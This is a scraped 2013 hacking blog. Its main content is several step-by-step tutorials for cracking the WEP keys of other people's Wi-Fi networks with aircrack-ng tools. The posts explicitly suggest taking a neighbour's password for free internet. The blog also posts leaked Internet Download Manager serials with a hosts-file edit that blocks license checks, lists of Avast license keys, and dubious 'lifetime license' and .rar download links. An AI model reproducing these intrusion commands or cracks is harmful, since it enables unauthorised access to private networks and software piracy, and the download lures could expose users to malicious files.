Thursday 16 May 2013

HACKING WEP KEY WITH AIRCRACK-NG


HACKING WEP KEY WITH AIRCRACK-NG

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP andWPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux and Windows.

DOWNLOAD Aircrack-ng: http://adf.ly/P96Gx

Wired Equivalent Privacy (WEP) is a securityalgorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network.WEP, recognizable by the key of 10 or 26 hexadecimal digits, is widely in use and is often the first security choice presented to users by router configuration tools.

Although its name implies that it is as secure as a wired connection, WEP has been demonstrated to have numerous flaws and has been deprecated in favor of newer standards such as WPA2. In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In 2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and WEP-104 "have been deprecated as they fail to meet their security goals"

VIDEO TUTORIAL:  http://adf.ly/P93y8 

Tuesday 14 May 2013

google image game funny game

 www.google.com/imghp         and type     Atari Breakout





BACKTRACK BASIC COMMANDS YOU MUST KNOW


BACKTRACK BASIC COMMANDS YOU MUST KNOW

                                                           File Operations


pwd              Print Name Of Current/Working Directory
cd                 Changing The Working Directory
cp                 Copy Files Or Directory
rm                 Remove Files And Directory
ls                   List Of Directory Contents
mkdir             Make Directory
cat                 Concatenate Files And Print On Standard Output
mv                 Move Files
chmod           Change Files Permissions

                                       Know Your System

                                                     
uname            Print System Information
who               Show Who Is Logged On
cal                 Displays Calculator
date               Print System Date And Time
df                   Report File System Disk Space Usage
du                  Estimate File Space Usage
ps                  Displays Information Of Current Active Processes
kill                 Allows To Kills Process
clear              Clear The Terminal Screen
cat /proc/cpuinfo      Cpuinfo Display CPU Information
cat /proc/meminfo    Display Memory Information


                                                               Compression


tar                To Store And Extract Files From An Archive File Known As Tar File
gzip              Compress Or Decompress Named Files



                Network

ifconfig          To Config Network Interface
ping               Check The Other System Are Reachable From The Host System
wget              Download Files From Network
ssh                Remote Login Program
ftp                 Download/Upload Files From/To Remote System
last                Displays List Of Last Logged In User
telnet             Used To Communicate With Another Host Using THe Telnet Protocol


                                         Searching Files

grep              Search Files(s) For Specific Text
find               Search For Files In A Directory Hierarchy
locate            Find Files By Name

TUTORIAL FOR MORE COMMANDS: http://adf.ly/P0xkG

Monday 13 May 2013

AVAST LIFE-TIME LICENSE KEY 2013


AVAST LIFE-TIME LICENSE KEY 2013

             AVAST ANTIVIRUS(UPDATED) LICENCE FILE 2013
 Hi friends!!!
Avast is now offering LIFE-TIME license key as part of 2013 PROMO for very limitted time .To get this license key you need to Download and install in you system

Steps to get Life-time license key:
1.     First you need to download avast from  the following link and you should install in your system
2.      Click here To download .After download Install this file in your system
3.    After installation click on avast and go to maintenance then click on registration. 

Note:
1.     Your Download and Installation are checked via logs by Avast.so you should completely download avast and you should complete the installation process otherwise you wont get key .if you are using avast on your system you need to uninstall old one and you should re install this new edition.
2.    You should complete installation process. You should use this Avast antivirus at least for one day (should be installed and active).Initially you’ll get 1 year license key after this you will be automatically renewed every year
                 ENJOY THE AVAST ANTIVIRUS FOR LIFE TIME
http://www.examsadda.com/2012/12/avast-licence-key-2013.html

INTERNET DOWNLOAD MANAGER (IDM) FULL VERSION




Hear are the steps

Step 1: First of all download IDM trial version from link given here click-to-download-IDM.
and install it on your PC or If you have already IDM installed on your PC then update it. To update open IDM, click on "help" tab and then select "Check for updates...". If you dont want to update then just click on  
"Registration" tab and select "Registration" from it.

Step 2: When you select "Registration", a new window will appear which will ask you for Name, Last Name, Email Address and Serial Key

Step 3: Now, enter your name, last name, and email address. And in serial key field enter any of the following key:-
(i) UVQW0-X54FE-QW35Q-SNZF5

(ii) FJJTJ-J0FLF-QCVBK-A287M

(iii) EC0Q6-QN7UH-5S3JB-YZMEK

(iv) W3J5U-8U66N-D0B9M-54SLM

(v) GZLJY-X50S3-0S20D-NFRF9

(vi) 398ND-QNAGY-CMMZU-ZPI39

(vii) UK3DV-E0MNW-MLQYX-GENA1

(viii) RLDGN-OV9WU-5W589-6VZH1

(ix) HUDWE-UO689-6D27B-YM28M

Step 4: Click "OK" button to register the IDM.

Step 5: If there is no error message in registering then there is no problem and your IDM is registered now, i.e., your IDM is converted to full  version. 

But, if you got any error message after clicking on "OK" button then proceed to the following steps....

For Widows XP users:

Proceed as follows.....


SubStep 1: Now Go to "START",  then go to "RUN" and type the following text and click enter:

    notepad %windir%\system32\drivers\etc\hosts

SubStep 2: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below you will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on "apply"and then click on Ok, now u will be able to edit the hosts file and save changes in it.

For Windows 7 users:

Users, due to security reasons you will not be able to save hosts file. So, follow the following procedure:
First of all go to C:/ drive, then go to Windows Folder, and then go to System32 folder, and then go to Drivers folder, and then go to Etc Folder, in the Etc folder you will see the hosts file.
in short go to "C:\Windows\System32\drivers\etc" folder.

Now right click on hosts file in etc folder and go to its "properties" then go to "Security" tab select "Users under Group or user names" and click on edit button, Permission For Host Window will get open, in that window select Users account and grant permission in bellow section which is “Permission for SYSTEM” by clicking all check boxes under “Allow” Name and press OK. Don't click on any Deny check box.
Note : if  you have login through admin then skip this step. It's just for granting permission for editing file.

SubStep 3: Now, a notepad file appears something like this as shown below:



Now copy the below lines of code

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

 and add to hosts file which is shown in above image box as follows:




After adding these piece of code, save the notepad file. And exit from there.

Now start your Internet download manager, and now you IDM has been converted to full versionand specially when you update next time, your registration will not expire.
That means it will remain full version for life time and you can update it without any problem in future.
Proof of Successfully Hacked IDM:





I hope, now, you will be able to convert your Trial version of IDM to Full Version. If you have any problem in this tutorial PLZ comment....

License Key Code to Activate Avast 6.0 & 7.0 Antivirus until 2038 AND Avast Internet Security with Key Till 13/06/2013


License Key Code to Activate Avast 6.0 & 7.0 Antivirus until 2038 First on net

You can download Avast v6.0.as we know avast! antivirus 
as the fastest solution for Windows.so must enjoy these keys.

W6754380R9978A0910-4TZ59467
W7414234R9978A0912-1CKJF7CA
W2883930R9958A0912-69B2ENTN
W7074160R9966A0910-ME228MPP
W6754380R9978A0910-4TZ59467
W5976768R9975A0912-A25DETRM 
W1898490R9977A0910-V7RZECSS
W7313705R9966A0911-VMW8Y2AH
          W7386915R9955A0910-FKUZHAXJ
W2050275R9942A0910-YRL5MKCS
W3089468R9947A0912-N6U6XXN5
W7600086R9964A0910-FPVUVFSR
W8353903R9975A0910-XA2SBVNH
W5476646R9963A0912-CM7R44NJ
W6832724R9941A0910-48L73FY1
W1679696R9956A0910-KK3DHPT3

Avast Internet Security with Key Till 13/06/2013



Avast Internet Security  with Key Till 13/06/2013First on net

The new avast! 7 Internet Security brings top-level security and privacy previously only known in corporate environments to your personal computer.Avast! Internet Security 7 is a all-in-one security suite that will help you protect your PC in real-time against viruses, spyware, malware and spam.Install Avast Internet Security 7 with License File or Activation Code in your computer .

AVAST Security Services recently released its latest version of the products. The latest version is avast! 7.Avast is one of the most popular antivirus application that is used by over150 million happy users.


downoad:
 http://199.91.154.112/261ld99l8uvg/b3ty6dpdatqbapi/Avast+Internet+Security+13-06-2013+By+leleGOD98.rar

CHATING WITH YOUR FRIEND BY COMMAND PROMPT


CHATING WITH YOUR FRIEND BY COMMAND PROMPT
HEAR R THE STEPS>>>

1. All you need is your friends IP address and your Command Prompt.

2. Open your notepad and write tis code as it is.................. I would prefer you to copy this !

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3. Now save this as "Messenger.Bat".

4. Drag this file (.bat file)over to Command Prompt and press enter!

5. You would then see some thing like this:

MESSENGER
User:

6. After "User" type the IP address of the computer you want to contact.

7. Before you press "Enter"
it should look like this:

MESSENGER
User: IP_Address
Message: Hi, How are you ?

8. Now all you need to do is press "Enter",
and start chatting

ENJOY YOUR SELF.........

Wednesday 8 May 2013

How to Download And Install BACKTRACK 5 R3 ( Video Tutorial )

WIRELESS | WI-FI MODEM NETWORK HACKING COMPLETE TUTORIAL


WIRELESS | WI-FI MODEM NETWORK HACKING COMPLETE TUTORIAL

Wireless network hack
the friends ask me about how toMany of
hack wifi network .so here is the tutorial
that will explain how to hack wifi.
In
our daily life some time our laptop
catching so many wi-fi signals but none of
them is accessible..and we think “I wish I
could
some how break the password and
access free internet”.
if
you are thinking like that than this
tutorial will definitely help you in
cracking password of wi-fi network for
free internet.
Tutorial On Hacking Wi-Fi NetworkTutorial On Hacking Wi-Fi Network
First of all you need to scan for available
wireless networks.
you can use“NetStumbler” or “Kismet”
for Windows and Linux and KisMac for Mac
Below is
a screenshot of NetStumbler.. It
will show you a list of all the wireless
access points in your range.
It’ll also show how the Wi-fi network
is secured..
Now the main par comes The two most
common encryption types are:
1) WEP (Wire Equivalent Privacy )
2) WAP(Wireless Application Protocol)
WEP allows a hacker to crack a WEP key
easily whereas WAP is currently the
most secure and best option to secure a
wi-fi network
It can’t be easily cracked as WEP
because the only way to retreive a WAP
key is to use a brute-force attack or
dictionary atack.
How To Crack WEPHow To Crack WEP
This is the practically tested way to hack
wi-fi network.
To crack WEP we will be using Live Linux
distribution called BackTrack to crack
WEP.
BackTrack have lots of preinstalled
softwares but for this time
The
tools we will be using on Backtrack
are:
a)Kismet – a wireless network detector
b)airodump
– captures packets from a
wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys
Follow The Steps One By OneFollow The Steps One By One
1) First of all we have to find a wireless
access point along with its bssid, essid and
channel number. To do this we will run
kismet by opening up the terminal and
typing in kismet. It may ask you for the
appropriate adapter which in my case is
ath0. You can see your device’s name
by typing in the command iwconfig.
2) To be able to do some of the later
things, your wireless adapter must be put
into monitor mode. Kismet automatically
does this and as long as you keep it open,
your wireless adapter will stay in monitor
mode.
3) In kismet you will see the flags Y/N/0.
Each
one stands for a different type of
encryption. In our case we will be looking
for access points with the WEP
encryption. Y=WEP N=OPEN 0=OTHER
(usually WAP).
4) Once you find an access point, open a
text document and paste in the networks
broadcast name (essid), its mac address
(bssid) and its channel number. To get the
above information, use the arrow keys to
select an access point and hit to get more
information about it.
5) The next step is to start collecting data
from the access point with airodump.
Open up a new terminal and start airodump
by typing in the command:
airodump-ng -c [channel#] -w
[filename] –bssid [bssid] [device]
In the above command airodump-ng
starts the program, the channel of your
access point goes after -c , the file you
wish to output the data goes after -w , and
the MAC
address of the access point goes
after –bssid. The command ends with the
device name. Make sure to leave out the
brackets.
6) Leave the above running and open
another terminal. Next we will generate
some fake packets to the target access
point so that the speed of the data output
will increase. Put in the following
command:
aireplay-ng -1 0 -a [bssid] -h
00:11:22:33:44:55:66 -e [essid]
[device]
In the above command we are using the
airplay-ng program. The -1 tells the
program the specific attack we wish to
use which in this case is fake
authentication with the access point. The
0 cites the delay between attacks, -a is
the MAC address of the target access
point, -h is your wireless adapters MAC
address, -e is the name (essid) of the target
access point, and the command ends with
the your wireless adapters device name.
7) Now, we will force the target access
point to send out a huge amount of
packets that we will be able to take
advantage of by using them to attempt to
crack
the WEP key. Once the following
command is executed, check your
airodump-ng terminal and you should see
the ARP packet count to start to increase.
The command is:
aireplay-ng -3 -b [bssid] -h
00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program
the specific type of attack which in this
case is packet injection, -b is the MAC
address of the target access point, -h is
your wireless adapters MAC address, and
the wireless adapter device name goes at
the end.
Once
you have collected around
50k-500k packets, you may begin the
attempt to break the WEP key. The
command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128
[filename].ivs
In this command the -a 1 forces the
program into the WEP attack mode, the -b
is the targets MAC address, and the -n 128
tells the program the WEP key length. If
you don’t know the -n , then leave it
out. This should crack the WEP key
within seconds. The more packets you
capture, the bigger chance you have of
cracking the WEP key.
Now you have learn how to hack wi-fi
network.
This
is the most practically way to hack
wi-fi network working genuinely.Always
put your try and i am sure this tutorial is
helpful to you.

HACK WIFI USING BACKTRACK


HACK WIFI USING BACKTRACK

How to Hack WiFi (WEP) Using Backtrack 4
1. Boot Live CD/DVD of BackTrack 4. After
it boots, type in “startx” to start GUI
2. Open new Konsole (backtrack’s terminal)
.
3. Type, not using qoutes, “airodump-ng
wlan0″. Now find the network you want to
attack. Copy the BSSID and the channel
(write down on piece of paper and keep
handy)
4. Open new Konsole, type “airodump-ng -w
wep -c 11 –bssid 00:24:b2:80:d7:3c wlan0″
**X & 00:24:b2:80:d7:3c are examples of
the channel and bssid you should have
copied**
5. You are now fixed on to the network you
want to attack.
6. Close the first Konsole, open a new
Konsole and type “aireplay-ng -1 0 -a
00:24:b2:80:d7:3c wlan0″
**00:24:b2:80:d7:3c is an example as
well**
7. Open another new Konsole, type
“aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0″
**00:24:b2:80:d7:3c example”
8. Go to first Konsole, wait for the Data to
reach to 30,000; go to 3rd Konsole, hit
CNTL + C, then type in “dir”, hit enter
9. Type “airecrack-ng wep.01.cap”, hit enter.
10. Let it run its course, should only take a
few moments. Once key is found, it will
show up with semi-colons in it. Take out
the semi-colons, and this will be the key.
(Example of key; 53:06:66:51:50, so it will
be 5306665150)
11. Enjoy Hacking, Enjoy Hackton

Hack WiFi Password Using Backtrack


Cracking WEP | Hack WiFi Password Using Backtrack

Everyone using a PC will have internet. And about 75% of them is for sure to have a WiFi modem. But the thing matters is all about the speed of internet, the speed of download. If you'r jealous of your neighbors internet, and if they have a modem. Here is a hack that might come in handy all the time. Now without any more lectures, i will start explaining with steps on hacking a WiFi modem.

Using the below steps you will get the password of your neighbor or any other modem.



Lets first start with the things you need

Wireless Adapter:-

The biggest requirement you'll need is a wireless adapter that's capable of packet injection, there are many cards capable of injecting packets, You can search  Google for the compatibility list of WiFi Cards

I use Alfa AWUS036H which is a very popular card and it performs well with Backtrack


Back Track Live DVD/CD or USB:-


Backtrack is a Linux distro with all  the essential tools required for penetration testing , I saw a blog which has written  articles on how to make a backtrack live CD / USB ,If your new here i would recommend you to read the following articles to get a better understanding of what backtrack is and how you can use it 
  • How to Install Backtrack - On Vmware
  • How To Make a Bootable Backtrack CD / USB

Now starting with steps:-

Cracking WiFi using Backtrack:-



Step -1 Booting Backtrack

Boot your copy of Backtrack from your USB drive (refer article on how to make a bootable Backtrack USB ),Once booted you will be prompted for the login details, enter usename as "root" and password as "toor", finally enter "startx " to start backtrack .Now once you have logged in, launch a new konsole terminal by clicking the konsole terminal icon which is there on the task bar .Now plug in your Wifi usb card and type in the following commands in the terminal as shown
ifconfig wlan0 up

where wlan0 is the name of the wireless card,it can be different .To see all wireless cards connected to your system simply type" iwconfig "

Step -2 Putting your WiFi Card on Monitor Mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air ,It is similar to a Promiscuous mode which is used for packet sniffing in a LAN .You can put your card into Monitor mode by entering the following commands in a terminal
airmon-ng  start (your interface)

Example :- airmon-ng  start wlan0

Now a new interface mon0 or ath0 will be created , You can see the new interface is in monitor mode by entering "iwconfig" as shown


Step -3  Monitor the air for WiFi Connections


Now after putting the card in monitor mode you will need to monitor the air for available wireless networks (WiFi connections)around  you , For this you'll have to use a tool called "airodump" .

So you can start monitoring the air with airodump by enter the following commands
airodump-ng  mon0

where mon0 is the new interface which we created in the previous step
Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type,

Stop the process by pressing  "ctrl +c " and select your target  ,Since i am only cracking WEP  i will take "yashi" as my target from now on.

Step -4 Capturing Data with Airodump 

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands
airodump-ng mon0 --bssid -c (channel ) -w (file name to save )
As my target is broadcasted in channel 2 and has bssid  "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "johnywep"
airodump-ng   mon0 --bssid  98:fc:11:c9:14:22   -c 2  -w  johnywep
Do not close this terminal (run the other commends simultaneously in an another terminal)


Step -5 Using Aireplay to Speed up the cracking  

You will have to capture at least 25,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack  you'll have do a Fake authentication (connect) with the  AP ,then you'll have to generate and inject data packets.This can be done very easily by using a tool called "aireplay"

So you can do a Fake authentication with the AP using aireplay by entering the following commands in a new terminal
aireplay-ng - 1  3  -a (bssid fo the target )  (interface)

In my case i enter the following

aireplay-ng -1 3  -a 98:fc:11:c9:14:22 mon0 

After doing a fake auth ,now its time to generate and inject Arp (data )packets . To this you'll have to open a terminal simultaneously and enter the following commands
aireplay-ng 3  -b (bssid of target)  -h ( address of your card (mon0))   (interface)

In my case i enter
aireplay-ng 3  -b 98:fc:11:c9:14:22   -h 00:c0:ca:50:f8:32 mon0
If this step was successful  you'll see Lot of data packets in the airodump capture ( step 4  ) as shown

Wait till it reaches at least 25000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the data packets  less the time to crack .once you captured enough number of packets, close all the process's by pressing "Ctrl +c" or by simply clicking the into mark which is there on the terminal

Strep -6 Cracking WEP  key using Aircrack 

Now its time crack the WEP key from the captured data, we use Aircrack to achieve this

Enter the following commands to crack the WEP key
aircrack-ng  (name of the captured file (step 4) )

In my case i enter 

aircrack-ng johnywep-0.1-cap
With in a few minutes Aircrak will crack the WEP key as shown


Voila you have successfully  cracked the WEP key in Six simple steps